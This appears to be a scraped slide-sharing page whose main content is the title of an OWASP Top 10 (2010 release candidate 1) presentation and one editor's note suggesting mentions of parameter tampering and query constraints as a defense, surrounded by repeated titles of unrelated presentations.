201610817 - edge part1201610817 - edge part1
201610817 - edge part1
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
 
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
 
20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-py
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8
 
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDEADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
 

OWASP Top 10 (2010 release candidate 1)

Editor's Notes

  1. Can we squeeze a mention of ‘parameter tampering’?It would also be nice to mention query constraints as a defense but maybe that’s too esoteric.